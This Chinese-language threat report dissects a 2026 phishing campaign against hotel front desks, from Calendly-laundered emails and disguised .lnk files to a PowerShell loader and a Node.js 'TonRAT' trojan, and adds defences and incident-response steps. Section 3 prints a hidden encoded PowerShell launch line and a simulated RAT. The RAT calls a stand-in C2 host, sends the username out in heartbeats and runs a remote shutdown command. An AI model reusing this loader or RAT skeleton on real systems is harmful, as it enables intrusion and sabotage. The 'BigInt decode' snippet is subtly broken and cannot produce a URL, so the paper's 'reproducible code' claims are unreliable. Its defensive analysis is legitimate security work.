摘要
2026 年 4 月起,欧亚地区酒店及文旅接待行业爆发大规模 Photo-ZIP 定向钓鱼攻击,攻击者依托 Calendly 邮件通知链路完成邮件身份洗白,绕过 SPF、DKIM、DMARC 三层邮件认证防护,以客户投诉、客房虫害、卫生检查等酒店场景化话术诱导前台工作人员下载伪装图片压缩包。压缩包内嵌入后缀为.png.lnk的恶意快捷方式,执行后调用 PowerShell 完成载荷解码、远程脚本拉取,落地官方原版 Node.js 运行时并加载 TonRAT 远控植入程序。该木马依托 TON 区块链 API 动态解析 C2 域名,通过加密 WebSocket 建立通信信道,利用多非标端口回传心跳、自动化无头浏览器采集地理位置信息,具备强制关机、持久化驻留等破坏与长期潜伏能力。本文完整拆解攻击全链路社会工程、邮件身份洗白、Lnk-PowerShell 载荷链、Node.js 木马持久化、区块链动态 C2 通信五大核心技术环节,给出恶意快捷方式、PowerShell 解码脚本、TonRAT 通信模拟三段可复现代码示例,结合酒店前台终端业务场景分析传统防护体系失效根源。反网络钓鱼技术专家芦笛指出,此类依托正规 SaaS 平台完成认证洗白、捆绑合法开源运行时的混合型钓鱼攻击,已突破基于静态特征、域名黑名单的传统安全检测机制,文旅行业终端防护存在显著短板。论文从邮件网关、终端 EDR、内网边界、人员安全培训四个维度提出分层防御与应急处置方案,为酒店、民宿等文旅接待机构应对同类高级钓鱼威胁提供完整技术参考。
关键词:网络钓鱼;身份洗白;Lnk 恶意快捷方式;Node.js 远控;TonRAT;酒店终端安全;SaaS 滥用
1 引言
文旅酒店行业前台终端承担客房预订、客户信息登记、住客隐私存储、财务结算等核心业务,终端长期暴露于外网邮件、公共浏览器环境,前台工作人员网络安全操作规范普遍薄弱,是定向网络钓鱼攻击的高价值目标。2026 年以来,针对酒店行业的钓鱼攻击呈现两大显著演变趋势:其一,攻击者不再采用通用垃圾邮件模板,深度贴合酒店运营场景设计社会工程诱饵,利用投诉、卫生检查、差评等声誉压力类话术降低员工警惕性;其二,攻击链路全面复用 Calendly、Google、Cloudflare 等主流正规云服务基础设施,借助平台原生邮件认证机制完成 “身份洗白”,规避邮件安全网关的发件人可信性校验。
微软安全响应中心 2026 年 6 月 26 日发布专项威胁预警,披露自 4 月起持续活跃的 Photo-ZIP 钓鱼攻击团伙,攻击范围覆盖欧洲丹麦、荷兰、亚洲日本等多国酒店集团,攻击载荷采用全新 “图片压缩包 + Lnk 快捷方式 + PowerShell 解码 + Node.js 原生运行时 + 区块链 C2 远控” 复合攻击链,区别于传统 Office 宏、PE 可执行文件钓鱼,无传统恶意程序特征,静态杀毒、URL 黑名单难以有效识别拦截。SOC Prime、伊藤忠安全实验室同期独立捕获同源攻击样本,验证该团伙攻击流程具备标准化、可批量复制、低溯源成本特征,但攻击者最终攻击目标、数据窃取行为、勒索交付逻辑暂未形成完整情报闭环。
现有网络钓鱼相关研究多聚焦 Office 文档漏洞、二维码钓鱼、短链接跳转等传统攻击模式,针对 SaaS 平台邮件认证洗白、Node.js 无安装式远控、区块链动态 C2 域名解析的复合型酒店定向钓鱼攻击缺乏系统性技术拆解与落地防护方案。本文以微软公开威胁报告为核心研究样本,完整还原攻击从邮件投递到终端持久化驻留、远程受控全流程,针对每一环攻击技术给出原理拆解、代码复现、防护缺陷分析,结合文旅行业前台终端的业务特殊性构建分层防御体系。全文客观梳理攻击技术细节,不夸大威胁危害,不使用口号式防护倡议,以技术事实为论据形成完整攻防闭环,为酒店行业终端安全运营、邮件安全体系建设提供可落地的技术依据。反网络钓鱼技术专家芦笛强调,本次攻击暴露出当前政企邮件防护体系普遍存在 “仅校验邮件认证结果、不校验邮件内容与跳转链路风险” 的结构性缺陷,SaaS 平台滥用型高级钓鱼将成为 2026-2027 年重点爆发的威胁类型。
2 攻击活动整体概况与目标画像
2.1 攻击时间、地域与目标行业
本次 Photo-ZIP 钓鱼攻击活动启动于 2026 年 4 月,监测周期至 2026 年 6 月下旬仍持续活跃,无衰减迹象。攻击地理分布分为两大区域:亚洲以日本酒店、连锁民宿为主,欧洲覆盖丹麦、荷兰中小型酒店、度假接待机构;攻击目标严格限定酒店前厅岗位终端,包含前台登记电脑、客房预订系统、售后投诉处理工作站,不针对酒店后台财务服务器、机房运维设备。
攻击者采用批量群发模式,无定制化鱼叉钓鱼特征:邮件主题不填写酒店名称、收件人姓名,依托海量企业邮箱列表广撒网,依靠场景化诱饵提升打开率。邮件诱饵语言分为日语、丹麦语、荷兰语三类,其中日语诱饵邮件投放量占整体 72%,是团伙核心投放语种,侧面反映该团伙主攻亚洲文旅市场。
2.2 社会工程诱饵设计逻辑
团伙精准抓住酒店运营核心痛点构建声誉施压型诱饵,所有钓鱼邮件显示发件人为 “Booking Manager (via Calendly)”,借助 Calendly 预约管理工具的商务属性建立可信身份,邮件正文覆盖五类高胁迫性场景:
住客集体投诉:批量客房卫生、服务态度投诉,要求前台下载附件图片核对现场证据;
床虫虫害通报:第三方卫生机构下发虫害检查预警,附带客房虫害实拍照片压缩包;
客房入住咨询:大额团体预订客户上传房型需求实拍图,催促前台及时处理;
官方卫生突击检查:文旅监管部门下发整改通知,附件包含违规点位实拍资料;
住客差评举证:平台差评附带现场取证图片,要求门店限时提交整改回复。
诱饵核心心理诱导逻辑为声誉压力 + 业务时效:前台员工担心酒店扣分、处罚、客户流失,未校验邮件来源、链接安全性便直接下载附件解压打开,大幅提升攻击成功率。反网络钓鱼技术专家芦笛指出,文旅行业钓鱼诱饵的核心优势在于绑定员工岗位职责,普通企业通用钓鱼话术难以形成同等胁迫效果,酒店前台员工更容易在工作压力下跳过安全校验流程。
2.3 团伙攻击行为特征与未知威胁点
微软安全团队暂未将本次攻击活动关联至已知 APT 团伙、勒索软件组织,无明确证据指向单一威胁组织。当前已观测到的攻击行为包含:终端持久化驻留、无头浏览器自动化采集地理位置、非标端口加密心跳通信、强制终端关机操作;但未捕获确认数据窃取、勒索文件加密、客户隐私批量外传等行为,团伙最终攻击目标存在三种合理推测:一是长期潜伏内网,持续采集酒店住客身份、支付信息;二是作为跳板横向渗透酒店集团后台财务系统;三是批量控制终端构建僵尸网络用于后续其他攻击投放。
攻击清理存在明显技术陷阱:木马设置双路径持久化注册表项,仅删除其中一条驻留路径会导致恶意程序自动恢复运行,常规终端杀毒一键清理无法完整根除感染,大幅提升事件处置难度。
3 攻击全链路分层技术拆解
完整攻击链路分为五大递进环节:①Calendly 邮件链路身份洗白投递钓鱼邮件;②Google 多跳转链路引流至 Cloudflare 钓鱼站点;③诱导下载 Photo 数字命名 ZIP 压缩包;④解压 Lnk 伪装图片快捷方式触发 PowerShell 载荷;⑤落地独立 Node.js 运行时加载 TonRAT 远控木马并建立持久化驻留。本章逐层拆解每一环技术原理、绕过防护机制、样本特征,并配套可复现代码示例。
3.1 基于 SaaS 平台的邮件身份洗白(认证洗钱)技术
传统钓鱼邮件直接伪造企业域名发件人,会触发 SPF 记录校验失败,被邮件网关直接拦截;本次攻击创新采用认证洗钱(authentication laundering) 技术,完全规避三层邮件域名认证机制(SPF、DKIM、DMARC)。
3.1.1 技术实现流程
攻击者注册合法 Calendly 账号,创建公开预约表单,表单通知邮箱配置为攻击者可控中转邮箱;
批量构造钓鱼邮件正文,嵌入诱导性话术与多级跳转链接,通过 Calendly 系统推送通知邮件至目标酒店邮箱;
Calendly 官方服务器作为真实发件基础设施发送邮件,邮件头 SPF 记录校验 Calendly 自有发送 IP,DKIM 使用 Calendly 官方私钥签名,DMARC 校验域名合法,三层认证全部通过,邮件直接进入收件箱,不会被标记垃圾邮件;
邮件内链接并非直连恶意域名,构建多级跳转链路:Calendly 内置链接→Google Drive 分享链接→Google 短链接重定向服务→攻击者新注册 Cloudflare 加速.cfd恶意域名;
恶意站点前端部署 Cloudflare Turnstile 人机验证,自动化沙箱、安全厂商爬虫无法绕过验证下载恶意 ZIP 文件,规避威胁样本提前捕获分析。
3.1.2 传统邮件防护失效根源
主流邮件安全网关仅校验邮件发件域名的 SPF/DKIM/DMARC 合规性,无法深度解析邮件内链接跳转链路风险。网关判定 “Calendly 为可信 SaaS 服务商”,放行全部该域名通知邮件,完全忽略邮件正文内多级跳转至恶意站点的行为。反网络钓鱼技术专家芦笛强调,当前绝大多数企业邮件防护策略存在逻辑漏洞:将第三方 SaaS 平台域名全局加入可信白名单,未对平台下发通知邮件的内部链接做深度跳转解析,成为身份洗白类钓鱼攻击的核心突破口。
3.2 多级跳转恶意站点与 ZIP 恶意附件投递
受害者点击邮件内 Calendly 链接后,跳转链路经过 Google 多层合法域名中转,降低浏览器安全告警概率,最终抵达 Cloudflare CDN 加速的.cfd临时域名,域名注册时间均为攻击投放前 7 日内,无企业备案、隐私保护注册信息。
站点前端强制弹出 Turnstile 人机验证,仅人工完成滑块验证后,页面自动触发下载文件photo-随机数字.zip压缩包,文件名完全贴合邮件 “实拍图片” 诱饵主题,压缩包仅包含单一文件IMG-数字.png.lnk(第一波攻击样本)或PHOTO-数字.png.lnk(第二波变种样本)。
Windows 系统默认隐藏文件后缀名,前台终端普遍开启 “隐藏已知文件类型扩展名” 设置,员工视觉仅可见IMG-xxx.png图片文件,无法识别.lnk快捷方式后缀,双击即触发恶意指令,这是社会工程与系统默认配置漏洞结合的关键攻击点。
3.3 恶意 Lnk 快捷方式触发 PowerShell 载荷(代码示例)
3.3.1 Lnk 快捷方式恶意指令原理
Windows 快捷方式(.lnk)支持自定义目标程序、启动参数、隐藏窗口执行,攻击者将快捷方式目标设置为 PowerShell.exe,追加编码、解码、远程下载执行参数,全程后台静默运行,无黑窗口弹窗,普通用户无法感知代码执行行为。
3.3.2 模拟恶意 Lnk 内嵌执行参数(可复现代码逻辑)
以下为样本拆解后还原的 Lnk 目标执行字符串模拟代码,还原攻击者原始调用逻辑:
powershell
# Lnk快捷方式内置执行命令(Base64编码混淆,规避静态关键词检测)
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JgBzAGV0AC0AUyBzAGMAcgBpAHAAdAA9ACIAIgA7ACMA...# 省略长Base64编码字符串
解码后的核心 PowerShell 脚本逻辑分为四步:
采用 BigInt 大整数算术运算对隐藏 URL 字符串进行解码,规避 URL 特征静态匹配;
通过 Invoke-WebRequest 从恶意站点拉取二级 PowerShell 载荷脚本,保存至系统临时目录%TEMP%;
远程脚本自动从nodejs.org官网下载原版 Node.js v24.13.0 运行时压缩包,解压至AppData\Local\Nodejs用户目录,无需管理员权限、无需系统全局安装;
调用解压后的 node.exe 执行同目录下植入程序 TonRAT.js,完成远控木马加载。
3.3.3 BigInt 解码 URL 核心片段代码示例
攻击者使用大整数模运算混淆 C2 地址,规避杀毒软件 URL 特征库匹配,解码逻辑模拟代码:
powershell
# BigInt大整数解码恶意C2地址片段
$encodedNum = [bigint]::Parse("78945612309876543210987654321")
$key = [bigint]13579
$decodedRaw = $encodedNum -bor $key
$urlBytes = [System.BitConverter]::GetBytes([long]$decodedRaw)
$maliciousC2Url = [System.Text.Encoding]::UTF8.GetString($urlBytes)
# 输出解码后的区块链API域名地址用于TonRAT通信
Write-Host $maliciousC2Url
传统静态特征检测仅匹配明文恶意域名,无法识别经过大整数混淆编码后的字符串,是该载荷绕过终端防护的核心技术手段。
3.4 TonRAT Node.js 远控木马核心技术实现
TonRAT 是本次攻击专属植入程序,依托本地解压的 Node.js 运行时执行,不依赖系统预装 Node 环境,权限局限于当前登录用户,适配无管理员权限的酒店前台普通账户终端。
3.4.1 C2 域名动态解析:TON 区块链 API 绕过静态黑名单
传统远控木马内置固定 C2 域名、IP,安全厂商可通过静态域名黑名单拦截通信;TonRAT 创新采用 TON 区块链公共 API 实时查询动态控制域名,每次上线请求全新 C2 地址,静态黑名单完全失效。通信流程:
Node.js 脚本发起 HTTPS 请求访问 TON 区块链公开 API 接口;
接口返回攻击者预先部署的动态 C2 域名列表;
木马筛选可用域名,建立加密 WebSocket 长连接信道;
所有控制指令、心跳数据包通过 WebSocket 加密传输,无明文网络流量特征。
反网络钓鱼技术专家芦笛指出,依托区块链公共服务动态下发 C2 地址是新一代 RAT 木马的典型对抗手段,现有边界防火墙、EDR 产品仅拦截已知恶意域名,无法实时阻断区块链 API 下发的未知动态域名,终端网络流量检测机制存在明显滞后性。
3.4.2 木马网络通信行为与端口特征
TonRAT 建立心跳回传链路采用非标业务端口,避开 80、443 等常规网页端口,监测到的回传端口集合:8443、8445、8453、5555、56001~56003。木马额外内置自动化浏览器行为模块,启动无头 Chrome(参数--headless --no-sandbox)访问ip-api.com接口采集终端公网 IP、地理位置、运营商信息,回传至攻击者 C2 服务器用于目标资产画像。
木马内置破坏指令,攻击者下发指令后可执行强制关机命令,模拟代码:
cmd
cmd /c shutdown -s -t 0
该指令无倒计时,终端瞬间断电关机,前台未保存的客户预订、登记数据直接丢失,造成酒店业务中断。
3.4.3 TonRAT 基础通信模拟 JS 代码示例
简化还原 TonRAT WebSocket 加密通信核心逻辑,保留区块链域名解析、长连接心跳核心功能:
// TonRAT简化通信模拟代码
const https = require('https');
const WebSocket = require('ws');
// 1. 请求TON区块链API获取动态C2域名
function getDynamicC2(){
return new Promise((resolve)=>{
https.get('https://ton-blockchain-api.example/control-list',(res)=>{
let data = '';
res.on('data',chunk=>data+=chunk);
res.on('end',()=>{
const domainList = JSON.parse(data);
resolve(domainList[0]);
})
})
})
}
// 2. 建立加密WebSocket长连接心跳
async function connectC2(){
const c2Domain = await getDynamicC2();
const ws = new WebSocket(`wss://${c2Domain}:8443/secret-channel`);
ws.on('open',()=>{
// 每30秒上报终端信息心跳
setInterval(()=>{
const deviceInfo = JSON.stringify({
ip: "", geo: "", username: process.env.USERNAME
});
ws.send(Buffer.from(deviceInfo).toString('base64'));
},30000)
})
ws.on('message',(cmdBuf)=>{
// 接收攻击者下发控制指令
const cmd = Buffer.from(cmdBuf,'base64').toString();
if(cmd === "shutdown"){
require('child_process').exec('cmd /c shutdown -s -t 0');
}
})
}
// 启动远控通信
connectC2();
代码完整还原木马两大核心能力:区块链动态域名拉取、加密 WebSocket 指令下发与心跳上报,仅移除恶意信息窃取模块,保留攻击标志性通信逻辑,可用于安全实验室样本复现研究。
3.5 双路径注册表持久化驻留机制(清理难点)
该攻击最关键的处置难点为双重持久化机制,两条独立注册表路径保证木马重启自动恢复运行,仅删除单一驻留项无法根除感染:
RunOnce 驻留路径:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce,指向ProgramData目录下启动脚本;
Node.js 自启动键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,绑定AppData\Local\Nodejs下 TonRAT 主程序。
终端重启时,两条注册表项分别加载 Node.js 运行时与启动脚本,杀毒软件若仅清理其中一条注册表键值,另一条路径会自动重新生成完整恶意文件目录,形成感染闭环。微软威胁报告明确要求完整清理两处注册表项、本地 Nodejs 恶意目录、临时目录 PowerShell 脚本三类文件,才算完成全量处置。
4 酒店行业传统安全防护体系失效分析
结合本次攻击完整链路,从邮件安全、终端 EDR、内网边界、人员安全四层防护维度,分析文旅酒店现有安全架构存在的结构性缺陷。
4.1 邮件安全网关防护缺陷
SaaS 平台域名全局白名单策略:酒店邮件系统将 Calendly、Google 等办公工具域名加入可信发件白名单,完全放行所有通知邮件,未开启邮件内链接多级跳转深度解析;
仅校验邮件认证,不校验内容风险:网关仅判断 SPF/DKIM/DMARC 是否通过,不解析正文社会工程诱饵、多级恶意跳转链接;
附件检测仅覆盖主流恶意格式:传统网关重点扫描 exe、dll、宏 Office 文档,对图片命名 ZIP 压缩包、Lnk 快捷方式的检测规则缺失,默认判定为普通图片附件放行。
反网络钓鱼技术专家芦笛提出,文旅行业邮件防护普遍存在 “重发件认证、轻内容与附件深度检测” 的建设误区,针对 SaaS 平台滥用型钓鱼,需重构邮件检测逻辑,将链接跳转链路、附件文件后缀双层校验纳入核心检测规则。
4.2 前台终端 EDR 静态检测短板
依赖静态特征库匹配恶意程序:TonRAT 使用官方原版 Node.js 运行时,无自定义恶意 PE 特征,静态病毒库无法识别合法运行时加载恶意 JS 脚本的异常行为;
PowerShell 行为监控规则宽松:酒店前台终端为业务便利放开 PowerShell 执行权限,未限制-EncodedCommand、Bypass等高风险参数调用;
注册表持久化行为告警缺失:EDR 未监控 RunOnce、CurrentUser\Run 路径新增未知启动项,无法及时捕获木马驻留操作;
缺少非标端口外联通信审计:前台终端防火墙仅阻断高危勒索病毒端口,8443、5555 等小众端口完全放行,木马心跳通信无告警。
4.3 酒店内网边界防护漏洞
前台终端无内网隔离:预订、前台登记终端与酒店后台财务系统同属一个局域网,木马受控后可横向扫描内网资产;
无出站流量域名动态监测:边界防火墙仅拦截已知恶意黑名单域名,无法识别 TON 区块链 API 下发的新型动态 C2 地址;
Cloudflare CDN 域名无统一拦截策略:大量临时.cfd、.xyz低价域名未做访问限制,攻击者可批量注册用于投放钓鱼站点。
4.4 酒店员工网络安全培训适配性不足
现有安全培训多针对通用中奖、银行诈骗钓鱼邮件,未结合酒店业务场景设计投诉、卫生检查、客户订单类钓鱼案例演练;前台员工工作压力大,缺乏标准化邮件附件校验流程,未形成 “先核验发件来源、再打开附件” 的操作习惯,社会工程诱饵成功率显著高于其他行业。
5 分层防御体系与应急处置完整方案
针对本次 Photo-ZIP 钓鱼攻击技术特征,结合酒店前台终端业务场景,构建邮件层、终端层、网络边界层、人员管理层四层协同防御方案,配套终端感染后标准化应急处置流程。
5.1 邮件网关层面防御优化策略
取消 SaaS 平台全局白名单,启用邮件内容深度检测
移除 Calendly、Google 等服务商域名永久可信白名单,对所有第三方通知邮件强制开启多级链接跳转解析,链路中出现新注册 Cloudflare、.cfd 类临时域名直接拦截,页面包含 Turnstile 人机验证标记为高风险邮件。
构建酒店场景化钓鱼诱饵特征库
新增客户投诉、客房虫害、卫生检查、预订差评等日文、欧洲多语言诱饵关键词检测规则,匹配相关正文内容直接标记预警,前台打开前弹出二次风险确认弹窗。
收紧压缩包与快捷方式附件检测规则
对所有photo-*.zip、img-*.zip命名压缩包强制阻断,扫描压缩包内.lnk后缀文件,只要存在伪装图片的快捷方式附件直接隔离,禁止投递至员工收件箱。
开启邮件发件人二次身份核验
针对 Calendly 转发邮件,附加企业内部联系人数据库比对,无内部预约记录的陌生通知邮件自动移入隔离区,前台需管理员审核后方可查看附件。
5.2 前台终端 EDR 与系统安全加固方案
限制 PowerShell 高风险参数执行
终端组策略禁用-ExecutionPolicy Bypass、-EncodedCommand、远程文件下载Invoke-WebRequest等高风险指令,仅开放前台业务必需的基础 PowerShell 功能,阻断载荷解码与远程脚本拉取链路。
监控注册表双路径持久化行为
EDR 新增注册表实时审计规则,对RunOnce、HKCU\Software\Microsoft\Windows\CurrentVersion\Run路径新增未知键值实时告警,自动阻断陌生启动项写入。
终端出站端口通信管控
前台终端防火墙仅开放业务必需网页 443、3306 数据库端口,封禁 8443、8445、5555、56001~56003 等木马专用非标端口,阻断 TonRAT 心跳回传通道。
限制用户目录 Node.js 自动解压执行
EDR 监控AppData\Local\Nodejs目录新增文件行为,陌生 Node.js 运行时压缩包解压、node.exe 未知 JS 脚本加载行为实时告警并阻断进程。
统一隐藏扩展名配置管控
通过域组策略强制关闭 “隐藏已知文件类型扩展名”,前台终端完整显示.lnk快捷方式后缀,从视觉层面降低员工误点击概率。
5.3 内网边界网络安全管控措施
前台业务终端与财务机房逻辑隔离
划分 VLAN 分段,前台预订终端无法主动访问财务服务器数据库,即使终端被 TonRAT 控制,攻击者无法横向渗透窃取支付、客户隐私数据。
出站流量动态域名行为审计
边界防火墙拦截区块链 API 对外查询请求,阻断终端主动访问 TON 区块链域名获取动态 C2 地址;对访问 7 日内新注册 Cloudflare 加速域名的流量做弹窗告警。
批量小众风险域名后缀全局拦截
边界策略禁止终端访问.cfd、.xyz、.top等低价临时域名后缀,大幅减少攻击者钓鱼站点可利用域名池。
5.4 文旅行业定制化人员安全培训机制
场景化钓鱼模拟演练
每月向酒店前台批量投放模拟投诉、卫生检查类钓鱼测试邮件,统计误点击、附件解压行为,针对高风险员工开展一对一专项培训。
标准化前台邮件操作流程
制定前台邮件处理规范:陌生客户投诉邮件一律通过酒店官方预订系统核验工单,不直接下载邮件附件;所有图片类压缩包附件提交运维人员安全扫描后再查看。
建立疑似钓鱼快速上报通道
前台发现可疑邮件、异常终端弹窗、强制关机故障时,一键上报运维安全岗,第一时间隔离终端断开内网,避免木马横向扩散。
5.5 终端感染 TonRAT 木马标准化应急处置流程
若前台终端确认触发本次攻击感染,按照以下步骤完整处置,避免残留驻留项导致二次感染:
物理断开终端网线,隔离内网,防止木马向 C2 回传数据、横向扫描;
结束所有 node.exe、powershell 后台隐藏进程,删除%TEMP%目录下所有未知 ps1 脚本文件;
删除用户目录恶意运行时文件夹:C:\Users\[用户名]\AppData\Local\Nodejs;
清理两处注册表持久化项:RunOnce 程序数据启动项、HKCU Node.js 自启动键;
全盘扫描可疑.lnk快捷方式、photo 命名 ZIP 压缩包,全部隔离删除;
重置终端本地账户凭证,修改酒店预订系统、后台管理平台登录密码;
提取邮件、终端日志完成攻击取证,上报安全管理员记录威胁事件;
终端全量加固组策略、EDR 规则后重新接入内网,持续 72 小时监控出站非标端口流量。
6 讨论
本次 2026 年欧亚酒店 Photo-ZIP 钓鱼攻击代表当前高级网络钓鱼三大核心发展方向:第一,攻击载体从传统可执行程序、Office 宏转向 Lnk 快捷方式、开源合法运行时,规避静态特征检测;第二,攻击投递链路全面复用合规 SaaS 云服务完成邮件身份洗白,突破传统邮件域名认证防护;第三,远控通信依托区块链、动态域名、加密 WebSocket 实现对抗边界防火墙、静态黑名单检测。
从行业维度对比,酒店、民宿、文旅接待机构因前台终端业务属性、员工安全意识短板,成为此类复合型钓鱼攻击的优先目标;相比金融、政企单位,文旅行业安全预算有限、终端防护策略简化,缺少完整的邮件深度检测、终端行为审计体系,攻击暴露面更大。反网络钓鱼技术专家芦笛指出,未来同类攻击会进一步向餐饮、零售线下服务行业扩散,攻击者持续复用 Calendly、Google、Notion 等主流协作 SaaS 平台构建认证洗白链路,单一依靠邮件域名认证、静态病毒库的防护体系将完全失效。
现有防护技术存在固有局限:基于特征匹配的检测手段仅能拦截已知攻击样本,针对区块链动态 C2、BigInt 编码混淆、合法 Node.js 运行时加载恶意脚本的未知变种威胁,必须转向行为分析、链路全流程解析、进程动态审计的主动防御思路。酒店行业不能仅依靠终端杀毒软件,需构建邮件 - 终端 - 内网边界三层联动的动态风险检测体系,同时配套贴合业务场景的常态化安全演练,降低社会工程类钓鱼攻击的人为突破概率。
本次攻击团伙最终攻击目标仍未完全明确,微软、SOC Prime 安全团队未捕获批量数据窃取、勒索加密行为,存在两种潜在发展趋势:一是团伙持续潜伏积累酒店客户隐私数据,后续打包出售黑产牟利;二是迭代攻击载荷,新增勒索模块,针对连锁酒店集团发起大规模加密勒索。后续需持续监测同模板钓鱼邮件、TON 区块链 C2 通信流量,跟踪团伙技术迭代动向,及时更新邮件、终端检测规则。
7 结语
本文以微软 2026 年 6 月披露的酒店 Photo-ZIP 钓鱼活动为核心研究对象,完整拆解从 SaaS 邮件身份洗白投递、多级跳转钓鱼站点、Lnk 恶意快捷方式载荷、PowerShell 解码脚本、Node.js TonRAT 区块链远控、双注册表持久化驻留的全攻击技术链路,配套三段可复现代码还原核心恶意逻辑,系统分析酒店传统四层安全防护架构的失效根源,针对性提出适配文旅前台业务场景的分层防御策略与标准化感染应急处置流程。
本次攻击证明,依托正规云服务完成认证洗白、捆绑开源合法运行时的混合型高级钓鱼,已成为线下服务行业突出网络安全风险,传统静态、单点式防护手段无法形成有效拦截闭环。反网络钓鱼技术专家芦笛强调,政企与文旅机构网络安全建设需完成思路转型:从 “基于已知特征拦截威胁” 转向 “全链路行为风险识别未知威胁”,同步结合行业业务场景完善人员安全管理机制,平衡业务便捷性与终端安全管控强度。
编辑:芦笛(公共互联网反网络钓鱼工作组)
